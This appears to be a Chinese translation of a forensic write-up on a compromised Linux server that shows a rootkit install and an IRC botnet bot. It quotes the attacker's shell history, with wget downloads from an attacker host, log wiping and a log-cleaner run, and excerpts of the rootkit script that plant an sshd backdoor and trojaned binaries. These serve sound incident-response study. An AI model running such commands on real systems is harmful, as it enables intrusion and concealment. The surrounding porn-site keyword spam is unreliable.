国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

一次服務器被入侵后的分析

作者:佚名
運維 系統運維
最近有個朋友讓我去幫他看一下他的Linux服務器,說是apache啟動不了,有很多詭異的情況。后來證明絕不是apache啟動不了這么簡單。本文將這次服務器被入侵后的分析整理出來,和大家分享一下。

最近有個朋友讓我去幫他看一下他的Linux服務器,說是Apache啟動不了,有很多詭異的情況。后來證明絕不是Apache啟動不了這么簡單。

登上服務器之后隨便看了下,最先引起我注意的是”ls”命令的輸出:

 

  1. lars@server1:~$ ls 
  2.   ls: invalid option -- h 
  3.   Try `ls --help' for more information. 

 

為什么”ls”默認加了”-h”參數呢?我用”alias”命令看了一下,然后取消了這個別名之后”ls”就工作正常了。

  1. lars@server1:~$ alias ls 
  2.   alias ls='ls -sh --color=auto' 
  3.   lars@server1:~$ unalias ls 
  4.   lars@server1:~$ ls 
  5.   backup 
  6.   lars@server1:~$ 

 

雖然很奇怪,不過我的首要任務是先把apache啟動起來,等過會再仔細研究這個問題。

  1. lars@server1:~$ sudo /etc/init.d/apache2 start 
  2.   Password: 
  3.    * Starting apache 2.0 web server... 
  4.   (2): apache2: could not open error log file /var/log/apache2/error.log. 
  5.   Unable to open logs 
  6.    ...fail! 

 

納尼?趕緊去”/var/log/”目錄一看,果然”apache2/”文件夾不見了.而且這個目錄下其他的文件夾,比如”mysql/”,”samba/”也都不見了.一定是哪里出錯了.會不會是我朋友不小心刪掉了呢,他跟我說絕對沒有.然后我用root登錄進去準備修復日志丟失的問題。

  1. lars@server1:~$ sudo -i 
  2.    Password: 
  3.    root@server1:~# ls 
  4.    ls: unrecognized prefix: do 
  5.    ls: unparsable value for LS_COLORS environment variable 
  6.    total 44 
  7.      4 .                 4 .bashrc           4 .ssh 
  8.      4 ..                4 .lesshst          8 .viminfo 
  9.      8 .bash_history     4 .profile          4 .vimrc 

 

很不幸的發現,”ls”又出問題了.同樣,用”alias”命令:

  1. root@server1:~# alias ls 
  2.    alias ls='ls -sa --color=auto' 
  3.    root@server1:~# unalias ls 
  4.    root@server1:~# ls 
  5.    root@server1:~# 

 

這個時候,我才意識到問題的嚴重性.”ls”奇怪的舉動和”/var/log/”大量日志被刪除讓我懷疑服務器是否被入侵了.當我看到root目錄下的”.bash_history”時,就已經可以確定被入侵了。

  1. root@server1:~# cat -n .bash_history 
  2.    ... 
  3.    340  w 
  4.    341  cd /var 
  5.    342  wget http://83.19.148.250/~matys/pliki/shv5.tar.gz 
  6.    343  tar -zxf shv5.tar.gz 
  7.    344  rm -rf shv5.tar.gz 
  8.    345  mv shv5 .x 
  9.    346  cd .x 
  10.    347  ./setup zibi.joe.149 54098 
  11.    348  passwd 
  12.    349  passwd 
  13.    350  ps aux 
  14.    351  crontab -l 
  15.    352  cat /etc/issue 
  16.    353  cat /etc/passwd 
  17.    354  w 
  18.    355  who 
  19.    356  cd /usr/lib/libsh 
  20.    357  ls 
  21.    358  hide + 
  22.    359  chmod +x hide 
  23.    360  hide + 
  24.    361  ./hide + 
  25.    362  cd /var/.x 
  26.    363  mkdir psotnic 
  27.    364  cd psotnic 
  28.    365  wget http://83.19.148.250/~matys/pliki/psotnic0.2.5.tar.gz 
  29.    366  tar -zxf psotnic0.2.5.tar.gz 
  30.    367  rm -rf psotnic0.2.5.tar.gz 
  31.    368  ls 
  32.    369  mv psotnic-0.2.5-linux-static-ipv6 synscan 
  33.    370  ./synscan 
  34.    371  vi conf 
  35.    372  vi conf1 
  36.    373  mv synscan smbd 
  37.    374  smbd -c conf 
  38.    375  ls 
  39.    376  ps aux 
  40.    377  ls 
  41.    378  ./smbd -c conf 
  42.    379  ./smbd -c conf1 
  43.    380  ./smbd conf 
  44.    381  ./smbd conf1 
  45.    382  ./smbd -a conf conf1 
  46.    383  rm -rf conf.dec 
  47.    384  rm -rf conf1.dec 
  48.    385  cd /usr/lib/libsh 
  49.    386  ./hide + 
  50.    387  exit 
  51.    ... 
  52.    425  ssh ftp@62.101.251.166 
  53.    426  w 
  54.    427  ls 
  55.    428  ls 
  56.    429  cd /var/.x 
  57.    430  ls 
  58.    431  cd psotnic/ 
  59.    432  ls 
  60.    433  rm -rf /var/log/* 
  61.    434  exit 
  62.    435  ls 
  63.    436  cd /var/.x/psotnic/ 
  64.    437  ls 
  65.    438  vi conf2 
  66.    439  ./smbd -c conf2 
  67.    440  ./smbd conf2 
  68.    441  ./smbd -a conf conf1 conf2 
  69.    442  rm -rf conf2.dec 
  70.    443  cd .. 
  71.    444  ls 
  72.    445  cd /usr/lib/libsh 
  73.    446  hide + 
  74.    447  ./hide + 
  75.    448  exit 
  76.    449  ps aux 
  77.    450  cd /var/.x 
  78.    451  ls 
  79.    452  ls 
  80.    453  cd psotnic/ 
  81.    454  ls 
  82.    455  cat pid.MastaH 
  83.    456  kill -9 2030 
  84.    457  ./synscan -a conf conf1 
  85.    458  ./smbd -a conf conf1 
  86.    459  cd /usr/lib/libsh 
  87.    460  ./hide + 

 

這個系統已經被入侵了.這實在是令人激動的一件事情,不過很顯然,我的朋友不這么想.這個入侵者犯了一個很基本的錯誤,沒有清除”.bash_history”文件.所以他/她可能在其他的地方也留下了一些蛛絲馬跡.接下來就是詳細的分析一下這次入侵。#p#

通過bash history我們得到了大量的信息.先來看一下”/var/.x”下面隱藏了什么和命令”setup zibi.joe.149 54098″的作用吧。

  1. root@server1:/var/.x# file setup 
  2.   setup: Bourne-Again shell script text executable 
  3.   root@server1:/var/.x# wc -l setup 
  4.   825 setup 
  5.   root@server1:/var/.x# head -17 setup 
  6.   #!/bin/bash 
  7.   # 
  8.   # shv5-internal-release 
  9.   # by: PinT[x] April/2003 
  10.   # 
  11.   # greetz to: 
  12.   # 
  13.   # [*] SH-members: BeSo_M, grass^, toolman, nobody, niceboy, armando99 
  14.   #                 C00L|0, GolDenLord, Spike, zion ... 
  15.   # [*] Alba-Hack : 2Cool, heka, TheMind, ex-THG members ... 
  16.   # [*] SH-friends: mave, AlexTG, Cat|x, klex, JinkS ... 
  17.   # [*] tC-members: eksol, termid, hex, keyhook, maher, tripod etc.. 
  18.   # [*] And all others who diserve to be here but i forgot 
  19.   # [*] them at the moment ! 
  20.   # 
  21.   # PRIVATE ! DO NOT DISTRIBUTE *censored*EZ ! 

 

“setup”這個腳本是rootkit shv5的安裝腳本.它安裝了一個修改過的ssh后門–”/bin/ttyload”,然后把它加到了”/etc/inittab”,這樣每次重啟后就會自動啟動.(相關部分的腳本如下:)

  1. mv $SSHDIR/sshd /sbin/ttyload 
  2.    chmod a+xr /sbin/ttyload 
  3.    chmod o-w /sbin/ttyload 
  4.    touch -acmr /bin/ls /sbin/ttyload 
  5.    chattr +isa /sbin/ttyload 
  6.    kill -9 `pidof ttyload` >/dev/null 2>&1 
  7.    .... 
  8.    # INITTAB SHUFFLING 
  9.    chattr -isa /etc/inittab 
  10.    cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1 
  11.    cat /etc/inittab |grep getty > /tmp/.init2 
  12.    echo "# Loading standard ttys" >> /tmp/.init1 
  13.    echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1 

 

它也替換了一些linux的標準命令。

  1. # Backdoor ps/top/du/ls/netstat/etc.. 
  2.    cd $BASEDIR/bin 
  3.    BACKUP=/usr/lib/libsh/.backup 
  4.    mkdir $BACKUP 
  5.    ... 
  6.    # ls ... 
  7.    chattr -isa /bin/ls 
  8.    cp /bin/ls $BACKUP 
  9.    mv -f ls /bin/ls 
  10.    chattr +isa /bin/ls 

 

這樣子就可以解釋為什么”ls”命令輸出那么奇怪了。

“.backup”文件夾保存了被替換之前的命令程序。

  1. root@server1:/var/.x# ls -l /usr/lib/libsh/.backup/ 
  2.   total 552 
  3.   -rwxr-xr-x   1 root     root       126276 Dec 24 22:58 find 
  4.   -rwxr-xr-x   1 root     root        59012 Dec 24 22:58 ifconfig 
  5.   -rwxr-xr-x   1 root     root        77832 Dec 24 22:58 ls 
  6.   -rwxr-xr-x   1 root     root        30388 Dec 24 22:58 md5sum 
  7.   -rwxr-xr-x   1 root     root        99456 Dec 24 22:58 netstat 
  8.   -rwxr-xr-x   1 root     root        65492 Dec 24 22:58 ps 
  9.   -rwxr-xr-x   1 root     root        14016 Dec 24 22:58 pstree 
  10.   -rwxr-xr-x   1 root     root        50180 Dec 24 22:58 top 

 

看了一下時間戳,居然是在圣誕節。

很顯然,原始的”ls”和后門安裝的”ls”是不一樣的.他們的md5對比如下:

 

  1. root@server1:~# md5sum /usr/lib/libsh/.backup/ls /bin/ls 
  2. eef7ca9dd6be1cc53bac84012f8d1675  /usr/lib/libsh/.backup/ls 
  3. 0a07cf554c1a74ad974416f60916b78d  /bin/ls 
  4.   
  5. root@server1:~# file /bin/ls 
  6. /bin/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, dynamically linked 
  7. (uses shared libs), for GNU/Linux 2.0.0, stripped 
  8.   
  9. root@server1:~# file /usr/lib/libsh/.backup/ls 
  10. /usr/lib/libsh/.backup/ls: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.0, dynamically linked 
  11. (uses shared libs), for GNU/Linux 2.6.0, stripped 

這個rootkit(“sh5.tar.gz”)是從下面的地址下載的。

  1. root@server1:~# dig +short -x 83.19.148.250 
  2.    4lo.bydg.pl. 

 

這是一個波蘭的ip,從這個ip上沒有得到更多的信息.不過這個入侵者依然犯了幾個嚴重的錯誤.

這是運行”setup”命令的截圖:(在服務器上的沙盒里運行的)

rq1

所以”zibi.joe.149″是后門的密碼,”54098″是端口號.這是一個來自ssh.com的就版本的sshd.測試截圖如下:

rq2

安裝完后門之后,下一個步驟就是裝一個irc-bot,讓服務器變成僵尸網絡中的一員.”psotnic0.2.5.tar.gz”就是來達到這個目的的.入侵者解壓這個包之后把 irc-bot重命名為”smbd”,來達到隱藏的目的。

然后,他創建了兩個配置文件.文件中包含irc服務器和需要加入的頻道.配置文件是加密過的,而且明文的配置文件被刪掉了。

 

  1. vi conf 
  2. vi conf1 
  3. .... 
  4. ./smbd -c conf 
  5. ./smbd -c conf1 
  6. ./smbd conf 
  7. ./smbd conf1 
  8. ./smbd -a conf conf1 

 

讓我們執行一下382這條命令,看看會發生什么。

  1. root@server1:/var/.x/psotnic# ./smbd -a conf conf1 
  2.    Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49) 
  3.    Copyright (C) 2003-2005 Grzegorz Rusin 
  4.    [+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1 
  5.    [+] Adding: */10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1 
  6.    [+] Added 2 psotnics to cron 

 

哇!它添加了cron定時任務.趕緊看一看:

 

  1. root@server1:/var/.x/psotnic# crontab -l 
  2.    */10 * * * * cd /var/.x/psotnic; ./smbd conf >/dev/null 2>&1 
  3.    */10 * * * * cd /var/.x/psotnic; ./smbd conf1 >/dev/null 2>&1 

 

#p#

接下來,我殺掉這兩個惡意的smbd進程,禁用cron任務.在另一個shell中運行了tcpdump,然后手動啟動了這兩個irc-bot進程:

  1. root@server1:~# cd /var/.x/psotnic; ./smbd conf 
  2.   
  3.    Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49) 
  4.    Copyright (C) 2003-2005 Grzegorz Rusin 
  5.   
  6.    [*] Acting as LEAF 
  7.    [+] Config loaded 
  8.    [+] Going into background [pid: 5724] 
  9.    root@server1:/var/.x/psotnic# ./smbd conf1 
  10.   
  11.    Psotnic C++ edition, version 0.2.5-ipv6 (Jul 17 2005 20:39:49) 
  12.    Copyright (C) 2003-2005 Grzegorz Rusin 
  13.   
  14.    [*] Acting as LEAF 
  15.    [+] Config loaded 
  16.    [+] Going into background [pid: 5727] 
  17.    root@server1:/var/.x/psotnic# 

 

用”ps”命令(后門替換過的)可以看到這兩個進程.這也是為什么入侵者需要通過改名字來隱藏進程。

  1. root@server1:/var/.x/psotnic# ps axuw | grep smb 
  2.    root      3799  0.0  0.4  8592 2156 ?        S    11:00   0:00 /usr/sbin/smbd -D 
  3.    root      3808  0.0  0.1  8592  896 ?        S    11:00   0:00 /usr/sbin/smbd -D 
  4.    root      5724  0.0  0.1  1648  772 pts/2    S    12:47   0:00 ./smbd conf 
  5.    root      5727  0.0  0.1  1640  764 pts/2    S    12:47   0:00 ./smbd conf1 

 

最開始兩個是真正的samba進程,后面兩個是irc-bot,讓我們用”strace”命令來看看它做了什么:

 

  1. root@server1:~# strace -p 5727 
  2.    ... 
  3.    connect(3, {sa_family=AF_INETsin_port=htons(9714), sin_addr=inet_addr("83.18.74.235")}, 16) = -1 EINPROGRESS (Operation now in progress) 
  4.    ... 
  5.    connect(4, {sa_family=AF_INETsin_port=htons(6667), sin_addr=inet_addr("195.159.0.92")}, 16) = -1 EINPROGRESS (Operation now in progress) 

 

可以看到它嘗試連接ip 83.18.74.235的9714端口和195.159.0.92的6667端口:

  1. root@server1:~# dig +short -x 83.18.74.235 
  2.    manhattan.na.pl. 
  3.    root@server1:~# dig +short -x 195.159.0.92 
  4.    ircnet.irc.powertech.no. 

 

又是一個波蘭的ip.另外一個ip,”ircnet.irc.powertech.no”是”irc.powertech.nof”的別名.是挪威一個著名的irc服務器。

tcpdump抓到了連接irc服務器的流量.正如下面的內容顯示,它連接到了”irc.powertech.no”,加入了”#aik”頻道。

 

 

  1. :irc.powertech.no 001 578PAB9NB :Welcome to the Internet Relay Network 578PAB9NB!~op@ti231210a080-3666.bb.online.no 
  2.     :irc.powertech.no 002 578PAB9NB :Your host is irc.powertech.no, running version 2.11.1p1 
  3.   
  4.     :578PAB9NB!~op@ti231210a080-3666.bb.online.no JOIN :#aik 
  5.     :irc.powertech.no 353 578PAB9NB @ #aik :578PAB9NB kknd raider brandyz jpi conf xerkoz IpaL vvo 
  6.     :irc.powertech.no 366 578PAB9NB #aik :End of NAMES list. 
  7.     :irc.powertech.no 352 578PAB9NB #aik ~op ti231210a080-3666.bb.online.no irc.powertech.no 578PAB9NB G :0 op - GTW 
  8.     :irc.powertech.no 352 578PAB9NB #aik ~kknd ti231210a080-3666.bb.online.no irc.hitos.no kknd H :2 kknd - GTW 
  9.     :irc.powertech.no 352 578PAB9NB #aik ~raider mobitech-70.max-bc.spb.ru *.dotsrc.org raider G :4 raider - GTW 
  10.     :irc.powertech.no 352 578PAB9NB #aik ~brandyz mobitech-70.max-bc.spb.ru *.dotsrc.org brandyz G :4 brandyz - GTW 
  11.     :irc.powertech.no 352 578PAB9NB #aik ~jpi p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp jpi G :8 jpi - GTW 
  12.     :irc.powertech.no 352 578PAB9NB #aik ~conf p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp conf G :7 conf - GTW 
  13.     :irc.powertech.no 352 578PAB9NB #aik ~xerkoz p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp xerkoz H :7 xerkoz - GTW 
  14.     :irc.powertech.no 352 578PAB9NB #aik lm campus19.panorama.sth.ac.at *.at IpaL H :5 .LaPi.9@.IRCNet.. 
  15.     :irc.powertech.no 352 578PAB9NB #aik ~vvo ppp86-7.intelcom.sm *.tiscali.it vvo H :6 vvo - GTW 
  16.     :irc.powertech.no 315 578PAB9NB #aik :End of WHO list. 
  17.   
  18. 這些僅僅是加入#aik頻道,并開始監聽該頻道所有成員的一些原始網絡流量.我決定自己進入這個頻道看看.令我驚訝的是不需要任何密碼我就進來了. 
  19.   
  20.     17:43 -!- viper42 [~viper42@trinity.gnist.org] has joined #aik 
  21.     17:43 [Users #aik] 
  22.     17:43 [ 578PAB9NL] [ conf] [ jpi ] [ raider ] [ vvo   ] 
  23.     17:43 [ brandyz  ] [ IpaL] [ kknd] [ viper42] [ xerkoz] 
  24.     17:43 -!- Irssi: #aik: Total of 10 nicks [0 ops, 0 halfops, 0 voices, 10 normal] 
  25.     17:43 -!- Irssi: Join to #aik was synced in 1 secs 

 

 

我發現我朋友的服務器使用的昵稱是”578PQB9NB”,還有一些其他的服務器也在這里.這些僵尸服務器應該是正在等待著我們的入侵者加入頻道發布命令.或者他已經潛藏在這里了.我注意到,所有的昵稱都有一個后綴”\*-GTW”,只有一個沒有:

  1. 17:45 [powertech] -!- IpaL [lm@campus19.panorama.sth.ac.at] 
  2. 17:45 [powertech] -!-  ircname  : LaPi@IRCNet 
  3. 17:45 [powertech] -!-  channels : #relaks #ping @#seks #aik @#ogame.pl 
  4.    #pingwinaria #hattrick #trade #admin @#!sh 
  5.    17:45 [powertech] -!-  server   : *.at [\o\  \o/  /o/] 

 

這是唯一一個加入了多個頻道的昵稱.我猜我已經找到這個入侵者了,除非這是一個故意迷惑的誘餌.(恩,這個入侵者真的真么笨!!這么容易就找到了!?).我決定等幾天看看有木有什么有趣的事情發生.這個域名解析到了:

  1. $ dig +short campus19.panorama.sth.ac.at 
  2.    193.170.51.84 

 

根據RIPE的數據,這個ip屬于Vienna University計算機中心,我發了一封郵件詢問關于這個域名的信息,他們幾個小時后會我了:

 

  1. From: Alexander Talos via RT 
  2.    To: larstra@ifi.uio.no 
  3.    Subject: Cracker at campus19.panorama.sth.ac.at (193.170.51.84)  [ACOnet CERT #38603] 
  4.    Date: Fri, 18 May 2007 18:22:43 +0200 (CEST) 
  5.    Reply-To: cert@aco.net 
  6.   
  7.    -----BEGIN PGP SIGNED MESSAGE----- 
  8.    Hash: SHA1 
  9.   
  10.    Hej! 
  11.   
  12.    On Fri May 18 14:45:03 2007, larstra@ifi.uio.no wrote: 
  13.   
  14.    > I have been tracking down cracker which connected from 
  15.    > campus19.panorama.sth.ac.at (193.170.51.84). The user, which 
  16.   
  17.    Ouch. panorama.sth.ac.at is a dormitory with about 4k rooms all 
  18.    behind a NAT gateway - it will be very hard to get hold of the 
  19.    miscreant. 
  20.   
  21.    This incident will, in the long run, definitely help me getting 
  22.    rid of the NAT boxes in setups like that, but right now, we will 
  23.    have to make do with what we have. 
  24.   
  25.    > Please investigate the host in question. Perhaps is this a 
  26.    > compromised host on your network acting as a jumpstation for 
  27.   
  28.    Sure, and even in a NATed environment, this is still possible. 
  29.   
  30.    Btw, you did a great job in analysing the compromised machine! 
  31.   
  32.    I'll let you know when I have either further questions or any 
  33.    interesting results. 
  34.   
  35.    Cheers, 
  36.   
  37.    Alexander Talos 
  38.   
  39.    - -- 
  40.    IT-Security, Universitaet Wien, ACOnet CERT 
  41.   
  42.    T: +43-1-4277-14351  M: +43-664-60277-14351 
  

 

看起來我不夠幸運。#p#

接下來我曾嘗試連接irc頻道里其他僵尸主機的 54098端口,可惜都失敗了.看來其他的僵尸主機的后門可能使用的是別的端口。

連接到”83.18.74.235″的流量看起來很混亂.只好再次用strace命令:

 

  1. root@server1:/var/.x/psotnic# strace -f ./smbd conf1 &> /root/dump.strace 

 

跟預期的一樣,有很多輸出,其中一個是它嘗試啟動”BitchX”,這是一個irc客戶端.但是失敗了,因為BitchX沒有安裝:

  1. [pid  7537] write(2, "sh: ", 4)         = 4 
  2.    [pid  7537] write(2, "BitchX: not found", 17) = 17 
  3.    [pid  7537] write(2, "n", 1)           = 1 
  4.    [pid  7537] close(2)                    = 0 

 

下面的截圖是tcpdump抓到流量的一部分:

rq3

這僅僅是兩個假的smbd進程中的一個.另外一個也連到了兩個irc服務器,一個是波蘭這個,另外一個是”irc.hitos.no”,位于挪威的特羅姆斯郡。

入侵者除了這些,還運行了一個叫”hide”的腳本來清除日志:

  1. root@server1:/usr/lib/libsh# ./hide + 
  2.    Linux Hider v2.0 by mave 
  3.    enhanced by me! 
  4.    [+] [Shkupi Logcleaner] Removing + from the logs........ . 
  5.   
  6.    [+] /var/log/messages  ... [done] 
  7.   
  8.    [+] /var/run/utmp      ... [done] 
  9.   
  10.    [+] /var/log/lastlog   ... [done] 
  11.   
  12.    [+] /var/log/wtmp      ... [done] 
  13.   
  14.    * m i s s i o n  a c c o m p l i s h e d * 
  15.   
  16.    p.h.e.e.r  S.H.c.r.e.w 

 

那么這個入侵者為什么還要把”/var/log/”目錄全刪除了呢,是不相信這個工具么?還是他特別害怕?

可以看到這個服務器被入侵了,安裝了后門而且加入了僵尸網咯.但是入侵者犯了幾個錯誤導致他可能被偵查到:

1、忘記清除”.bash_history”文件

2、“/var/log”目錄下所有文件都刪除了.導致某些程序無法啟動.很容易被發現.

3、修改了root的密碼.又是一個愚蠢的行為.永遠不要修改root密碼,這個必然會引起管理員的注意.

4、irc的頻道沒有密碼保護.雖然即使有密碼,我們也可以抓包分析出來.

5、入侵者平時就在僵尸網絡的頻道閑逛?如果是這樣的話那他已經暴露了.

當然還有幾個遺留的問題:

1、”ssh ftp@62.101.251.166″ 這個命令是干嘛的.是入侵者不小心敲錯了么還是有其他的目的?

 

  1. $ dig +short -x 62.101.251.166 
  2.      cA6FB653E.dhcp.bluecom.no. 

 

2、跟83.18.74.235(manhattan.na.pl)的通訊內容是什么?

3、最重要的問題是他一開始是如何或得下系統的權限的?這個服務器運行的是Ubuntu 6.06 LTS,打了最新的補丁。可能入侵的途徑:

*猜測root密碼,不幸的是這個密碼是強密碼*

*未知的exploit*

*某個用戶在已經被攻陷的主機上登錄這臺服務器.入侵者嗅探到了密碼.*

原文出處: lars strand   譯文出處: freebuf

【編輯推薦】

 

  1. 六種Linux桌面的最佳特性和最差特性
  2. Linux系統監控知識分享
  3. 如何在Linux桌面或Mac上運行Windows應用程序?
  4. Linux 環境下快速部署 MySQL 的替代方案
  5. 高效Linux用戶需要了解的命令行技能
  6. 如何找到一款適合自己的Linux發行版?

 

【責任編輯:黃丹 TEL:(010)68476606】

責任編輯:黃丹 來源: jobbole.com
服務器LinuxApache
相關推薦

2013-12-24 13:59:03

2022-02-17 11:19:33

Kubernetes服務器運維

2013-12-23 09:38:11

2016-09-08 22:54:14

2022-09-14 12:01:35

服務器入侵篡改,

2019-08-01 15:05:22

2009-10-22 13:18:03

2019-06-11 09:23:38

2017-10-18 09:06:41

2011-03-04 12:33:16

2022-10-25 08:56:16

2010-04-28 17:14:52

Google服務器

2018-05-30 11:09:41

memcache服務器故障

2019-06-10 15:20:18

2017-12-06 19:00:53

2014-08-29 09:09:33

2019-10-25 22:06:38

服務器開發工具

2020-03-22 15:17:17

服務器科技芯片

2018-03-02 10:42:44

服務器數據備份

2014-08-01 14:06:45

點贊
收藏

51CTO技術棧公眾號

精品一区二区中文字幕| 99香蕉久久| 久久久久久久久久码影片| 久久成人精品视频| 欧美日韩国产首页| 久久精品网站免费观看| 美女视频网站黄色亚洲| 日韩欧美一区二区三区免费看| 天堂中文在线播放| 风间由美一区| 1024手机看片国产| 成人黄色大片网站| 日韩影视精品| 国产精品一区二区欧美黑人喷潮水| 久久久久久久久亚洲| 色偷偷av一区二区三区| 日韩高清人体午夜| 精品噜噜噜噜久久久久久久久试看| 亚洲视频自拍偷拍| 久久久综合激的五月天| 亚洲欧美se| 国产精品一区二区免费在线观看| 欧美日韩日日骚| 国产精品毛片视频| 亚洲欧美国产日韩综合| 国产91精品久| 国产精品青草久久| 视频91a欧美| 高清毛片在线看| 最美情侣韩剧在线播放| 成人免费a级片| 国产一区二区片| 鲁一鲁一鲁一鲁一色| 国产成人无码一二三区视频| 日韩欧美精品在线观看视频| 97国产精东麻豆人妻电影 | 国产精品中文在线| 国产综合色香蕉精品| 国产999精品久久久| 欧洲成人免费视频| 国产精品视频自拍| 成人久久久久久| 国产一区再线| 黄色在线播放网站| 四虎精品在线观看| av中文字幕电影在线看| 日本一二区视频| 成人午夜影院| 一级在线免费观看| 欧美人与性动交α欧美精品济南到 | 影音先锋欧美精品| 日韩成人av在线| 久久久极品av| 欧美丰满老妇厨房牲生活| 国产精品一区=区| 久久久久亚洲精品| 在线观看久久久久久| 国产成人精品电影久久久| 精品国产一区二区三区四区vr | 免费黄色在线看| 久草免费在线视频| 日本成在线观看| a屁视频一区二区三区四区| 国产精品qvod| 中文有码一区| 亚洲欧美日韩小说| 日韩欧美久久久| 午夜电影久久久| 中文字幕av在线一区二区三区| 成人av在线一区二区| 亚洲美女区一区| 精品88久久久久88久久久| 欧美激情伊人电影| 日韩av一区二区三区在线观看| 无限资源日本好片| √最新版天堂资源网在线| 国产精品九九九| 国产综合 伊人色| 欧美狂欢多p性派对| 深夜视频一区二区| 麻豆91精品| 一本大道综合伊人精品热热| 欧美成人精品影院| 大桥未久一区二区三区| 黄色动漫在线| 亚洲色图欧美| 亚洲乱码精品一二三四区日韩在线| 国产性色av一区二区| 手机成人在线| 日本在线看片免费人成视1000| 日韩欧美视频专区| 一区在线观看视频| 欧美国产日韩精品| 国产精品免费成人| 天堂久久午夜av| 国产成人av电影在线观看| 亚洲精品美女久久久| 欧美中日韩一区二区三区| 激情小说亚洲| 影音先锋久久资源网| 国产精品初高中害羞小美女文| 在线观看免费视频综合| 欧美一级视频一区二区| 亚洲成色www久久网站| 日本桃色视频| 国产精久久一区二区| 精品成av人一区二区三区| 视频成人永久免费视频| 亚洲精品动态| 顶级嫩模精品视频在线看| 一区二区三区不卡视频在线观看| 九九热精品视频| 4虎在线播放1区| 操欧美老女人| 欧美午夜免费电影| 手机看片福利永久国产日韩| 国产蜜臀在线| 99久久亚洲一区二区三区青草| 久久久国产一区二区三区| 国产视频97| 亚洲国产一区二区三区a毛片 | 国产高清精品一区二区| 成人av福利| a级精品国产片在线观看| 8090成年在线看片午夜| 日本a一级在线免费播放| 亚洲一区网站| 综合网中文字幕| qvod激情图片| 免费看亚洲片| 久久久久久有精品国产| 国产福利在线| 处破女av一区二区| 国产成人高潮免费观看精品| av在线免费观看网址| 91蝌蚪porny| 亚洲自拍欧美色图| 在线观看高清av| 岳的好大精品一区二区三区| 国产99久久久国产精品潘金网站| 欧美国产日韩在线观看| 亚洲国产精品视频在线观看 | 亚洲电影免费观看高清| 国模极品一区二区三区| 欧美日韩视频免费在线观看| 91在线视频免费看| 欧美区亚洲区| 色久优优欧美色久优优| 久久精品久久精品国产大片| 日韩电影精品| 色综合久久99| 国产美女主播在线播放| 欧美在线三级| 色婷婷av一区二区三区之一色屋| 很污的网站在线观看| 首页亚洲欧美制服丝腿| 国产婷婷97碰碰久久人人蜜臀| www.久久久| av免费看在线| 亚洲欧美综合| 日韩电视剧免费观看网站| 亚洲一卡二卡区| 日韩欧美激情| 欧美日韩在线看| 日韩美女主播视频| 日本欧美肥老太交大片| 伊人伊成久久人综合网小说| av一区二区三区免费观看| 国产成人av网站| 久久久久久国产精品免费免费| 久久久亚洲欧洲日产| 国产午夜精品一区理论片飘花 | 亚洲精品伦理在线| 亚洲自拍偷拍二区| 国产乱码精品一区二区三区四区| 欧美精品三级在线观看| 综合网五月天| 日av在线不卡| 青青草原成人| 久久成人麻豆午夜电影| 国产免费成人在线| 国产欧美精品一区aⅴ影院| 久久免费精品日本久久中文字幕| 亚洲日本一区二区三区在线| 久久97久久97精品免视看| 欧美日韩性在线观看| 亚洲国产精品综合| 中文精品在线| 亚洲欧美国产高清va在线播| 免费一级欧美在线大片 | 日韩精品影视| 国产精选一区二区| 888久久久| 国产精品日韩一区二区三区| 亚洲色诱最新| 日韩高清国产精品| 免费观看在线色综合| 欧美日韩大片一区二区三区| 99在线精品一区二区三区| 福利在线小视频|